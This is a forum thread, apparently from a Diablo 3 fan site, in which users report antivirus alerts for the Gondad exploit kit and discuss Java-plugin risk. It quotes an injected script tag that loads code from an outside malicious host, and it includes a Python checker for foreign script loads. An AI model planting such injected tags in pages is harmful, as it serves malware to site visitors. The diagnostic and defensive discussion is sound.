I'm getting it too.
AVG paid anti virus. 10.0.1427 2441/5332
www.issseem.org/net/index.html. Exploit Gondad exploit kit (type 1935)
I got it too. Second time in roughly a week (different exploits). I'm about to have to decide to find a different D3 site.
Same here - actually it was a JavaScript injecting the page www.issseem.org/net/index.html - the context in the source is as follows:
<div style="660px; "><p><script src=http://www.issseem.org/a.js></script></div>
<div class="box" style="width: 310px; float: left; margin: 6px; padding: 3px; height: 204px;"><a href="http://diablo.incgamers.com/blog/comments/diablo3ladders-com-season-starting-soon-new-cutsom-groups-kill-score-ladders"></div><img title="diablo 3 kill score ladders and groups" src="http://diablo.incgamers.com/wp-content/uploads/2011/10/kill_scores1.jpg" alt="diablo 3 kill score ladders and groups" width="310" height="166" /></a>
<div style="background: #000000; padding: 6px; height: 28px; color: #ffffff;"><strong>Monthly Kill Score Ladders & Custom Ladders now available.</strong></div>
<div class="box" style="width: 310px; float: left; margin: 6px; padding: 3px; height: 204px;"><a href="http://diablo.incgamers.com/blog/comments/magic-find-evolution-in-diablo-iii"></div><img title="magic find in diablo 3" src="http://diablo.incgamers.com/wp-content/uploads/2011/10/MAGIC_FIND.jpg" alt="magic find in diablo 3" width="310" height="166" /></a>
<div style="background: #000000; padding: 6px; height: 28px; color: #ffffff;"><strong>From first reveal to present day, how has magic find changed and what might its future be.</strong></div>
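A site operator can catch this kind of injection by listing every script, iframe, embed or object tag on a rendered page that loads from a host outside the site's own. This is an added example, not part of the original post: the sample markup is constructed from the snippet quoted above, and the relative script path and the cdn.example.net iframe are made-up placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Tags (and the attribute on each) that make the browser fetch remote content.
LOAD_ATTRS = {"script": "src", "iframe": "src", "embed": "src", "object": "data"}

# Constructed sample: first line mirrors the quoted source, the rest is made up.
SAMPLE_HTML = """
<div style="660px; "><p><script src=http://www.issseem.org/a.js></script></div>
<div class="box"><a href="http://diablo.incgamers.com/blog/"></a>
<img src="http://diablo.incgamers.com/wp-content/uploads/2011/10/MAGIC_FIND.jpg" /></div>
<script src="/clientscript/site.js"></script>
<iframe src="//cdn.example.net/widget.html"></iframe>
"""

class ForeignLoadFinder(HTMLParser):
    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed = {h.lower() for h in allowed_hosts}
        self.findings = []  # (line, tag, host, url)

    def handle_starttag(self, tag, attrs):
        attr = LOAD_ATTRS.get(tag)
        url = dict(attrs).get(attr) if attr else None
        if not url:
            return
        host = (urlparse(url.strip()).hostname or "").lower()
        # An empty host means a relative URL, i.e. the page's own origin.
        ok = any(host == a or host.endswith("." + a) for a in self.allowed)
        if host and not ok:
            self.findings.append((self.getpos()[0], tag, host, url))

def find_foreign_loads(html, allowed_hosts):
    """Return every active-content load whose host is not on the allowlist."""
    finder = ForeignLoadFinder(allowed_hosts)
    finder.feed(html)
    finder.close()
    return finder.findings

if __name__ == "__main__":
    for line, tag, host, url in find_foreign_loads(SAMPLE_HTML, {"diablo.incgamers.com"}):
        print(f"line {line}: <{tag}> loads from {host} ({url})")
```

Run against saved copies of the live pages on a schedule, a new host in the output is the signal to go look at the template or database row that produced it.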
Maybe Google is picking up on the links that spammers poop on the site?
I'm not sure if I accidentally told AVG to ignore the warning or not but I had to unblock the site several times over the past week. Same exploit came up and was blocked each time I came to the site that others have reported.
Is there any info as to what this particular malware does, if it had been installed on our machines? I don't /think/ anything's been installed on my pc - my virus scan comes up clean at least (the same one that warned me about the site) - but I'm curious what this stuff is meant to do, and if there's any way I can be extra safe about it.
I've gotten a ton of these warnings (but hadn't noticed this particular thread until today... I pmed the mods about it though, and they gave me the basic story of what's been going on).
Also just as an aside, I really think this thread belongs in a more highly visible place. It's pretty important imo. I appreciate the efforts that the staff and everyone have gone to, and don't want to get people worked up or anything, but I think it's really important that they know what's been going on if they happened to not have antivirus stuff on their pc for whatever (poor) reason. I'm just saying... the feedback/suggestions/support forum is probably one of the last subsections of this site I'd be likely to visit.
http://www.avgthreatlabs.com/webthre...d-exploit-kit/
This is what the site was serving up once in a while. In itself it's just a way to get into your computer and install pretty much anything they want. So I don't know what malware ended up on an unprotected PC.
By warnings do you mean the Google "Site blocked" warning or something from your AV? If it was the latter you should be safe (assuming it didn't just warn, but also block), if only the former something might have slipped through. A full scan coming up clean is a good sign, though, I suppose (if the AV is decent). You can also try doing it in Windows safe-mode to make sure that any malware has a low chance of using tricks to hide itself. /e: Okay you said your AV. *blind*
As a general side-note: Uninstall/disable your browser's Java plugin. Gondad uses holes in Java. Not to mention that there's been a lot of new holes discovered recently and that many users (or at least me) don't even really need Java in the browser.
+1. Though it's a bit late. The Google warnings probably didn't help user trust either. Maybe some general (and visible) statement would be a good idea.
FYI Firefox 16.0.1 on Linux complains about this too.
I've seen this thing go rampant on various sites using vBulletin, might be an exploit.